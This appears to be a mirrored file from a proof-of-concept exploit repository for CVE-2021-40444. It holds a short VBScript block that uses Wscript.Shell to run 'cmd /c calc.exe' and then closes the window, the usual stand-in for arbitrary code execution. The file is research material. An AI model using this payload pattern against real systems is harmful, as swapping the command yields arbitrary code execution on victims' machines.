mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-15 02:17:54 +00:00
11 lines
200 B
Text
11 lines
200 B
Text
|
<script language="VBScript">
|
||
|
Function Calc()
|
||
|
Dim wsh
|
||
|
Set wsh = CreateObject("Wscript.Shell")
|
||
|
wsh.run "cmd /c calc.exe"
|
||
|
Set wsh = Nothing
|
||
|
End Function
|
||
|
|
||
|
Calc
|
||
|
self.close
|
||
|
</script>
|